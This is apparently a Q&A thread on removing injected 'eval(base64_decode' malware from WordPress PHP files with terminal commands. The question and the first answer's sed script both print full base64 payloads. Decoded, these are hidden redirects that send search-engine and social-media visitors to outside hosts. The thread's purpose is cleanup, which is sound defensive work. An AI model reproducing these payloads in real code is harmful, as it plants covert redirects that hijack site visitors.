# Deleting base64 Eval Junk with (osx) terminal

Tags: php, macos, terminal

Trying to clean up after a slew of php injections -- every php function in about six sites worth of WordPress templates is full of junk.

I've got everything off the server, onto a local machine, and I'm hoping there should be a good way to delete all of the enormous code strings with terminal.

Of which I know approximately nothing.

http://devilsworkshop.org/remove-evalbase64decode-malicious-code-grep-sed-commands-files-linux-server/  had good instructions for doing a clear on the server, but substituting my path/to/folder doesn't seem to be working in terminal.

Feeling I'm close, but, blind as I am to the ways of the terminal, that doesn't seem that comforting.

Based on the above, here's what I've got -- any help would be so amazingly appreciated.

```
grep -lr --include=*.php "eval(base64_decode" "/Users/Moxie/Desktop/portfolio-content" |     xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'
```

*UPDATED*

derobert -- thanks a million for helping with this --

basically, the space after every `<?php` before the actual function had this inserted into it:
    `eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3LnN0bHAuNHB1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));`

The characters change with each one, so a simple find and replace won't work (which was, I'm pretty sure, the point).

Answer (score 1):

here is my code that proved as a valid solution.

I downloaded all the files to my local machine and started working on solution. Here is my solution {combination with what I goggled out}

```
    #!/bin/bash
    FILES=$(find ./ -name "*.php" -type f)
    for f in $FILES
    do
    echo "Processing $f file LONG STRING"
    sed -i 's#eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly93a3BiLjI1dS5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ=="));##g' $f
    echo "Processing $f file SMALL STRING"
    sed -i 's#eval(base64_decode.*));##g' $f
    done
```

save it somewhere as mybash.sh {from your favourite text editor}

```
    $ sudo chmod +x mybash.sh //execute permission for script
    $ ./mybash.sh
```

I have used the first one LONG STRING cause the pattern is always the same. Here is the explanation for the above code

- **s#** - starting delimiter {#-delimiter same as / as in rule for sed}
- **eval(base64_decode.*));*** { first pattern to match, Reg Exp [. - Matches any single character], [ - Matches the preceding element zero or more times]}
- **#** - second appearance of delimiter {#}, after # is empty which basically means replace first string {eval(base64_decode.*));} WITH {''}
- **#g** - end of command, SED syntax

Answer (score 0):

So, someone got access to write to arbitrary files on your server. I assume you've cleaned up the exploit that let them in already.

The problem is, while the `eval(base64_decode` stuff is obvious, and has to go, the intruder could have put other stuff in there. Who knows, maybe he deleted a `mysql_real_escape_string` somewhere, to leave you vulnerable to future SQL injection? Or a `htmlspecialchars`, leaving you vulnerable to JavaScript injection? Could have done anything. Might not even be PHP; you sure no JavaScript was added? Or embeds?

The best way to be sure is to compare to a known-good copy. You do have version control and backups, right?

Otherwise, you can indeed use `perl -pi -e` to do a substitute on that PHP code, though matching it might be difficult, depending. This might work (work on a copy!), and adjust spacing in the regexp as needed:

```
perl -pi -e 's!<\?php eval\(base64_decode\(.*?\)\) \?>!!g' *.php
```

but really, you should review each file by hand, to confirm there are no other exploits present. Even if your last known-good copies are somewhat old, you can review the diffs.

### edit:

Ok, so it sounds like you don't want to nuke the whole PHP block, just the eval line:

```
perl -pi -e 's!eval\(base64_decode\(.*?\)\);!!g' *.php
```

You may want to add a `\n` before the first `!` if there is additionally a newline to kill, etc. If the base64 actually has newlines in it, then you will need to add `s` after the `g`.

Comment: Good backups would have been much, much, better. But, they don't exist.  They will when I'm through.  And, you're absolutely right, I will have to go through by hand -- but, not having to click and drag a few thousand times will help.   As it is, I get "Can't open *.php: No such file or directory." -- which is what I was getting before.  This is after cd -ing to a directory that _does_ have .php files.  any Ideas?

Comment: @Martin What does `echo *.php` in that directory do? Does it print *.php, or does it print a listing of them all? And, also, is this on the server, or have you copied the files to a local machine?

Comment: OK -- so, the no such file was me being stupid. In the *correct* directory, hitting return gives me the nice, clean "ok tell me something else to do" line beginning (name of the comp with a : and a cursor) -- but all the files all intact.

Comment: @Martin I don't know exactly what your exploit code looks like, as you didn't post it (or, at least, an excerpt of it). My regexp no doubt needs a little customization to match it.

Comment: understood -- updated the question with more, hopefully useful, information. Let the fact that I had to look up regexp stand as a testament to my ignorance.

Comment: @Martin OK, I've updated my answer. Please beware that regexp is a "quick and dirty" tool to do this job, it *may* do some things wrong, as it doesn't actually understand PHP syntax. Please only work on a copy of your files, and review the diffs.

Comment: How can i do this recursively? There's a lot of files in sub directories that remain unchanged.

Comment: @KevinVandenborne The easiest way would to to chain it with `find`: `find -type f -name *.php -exec perl -pi -e 's!eval\(base64_decode\(.*?\)\);!!g' '{}' '+'` ought to do it.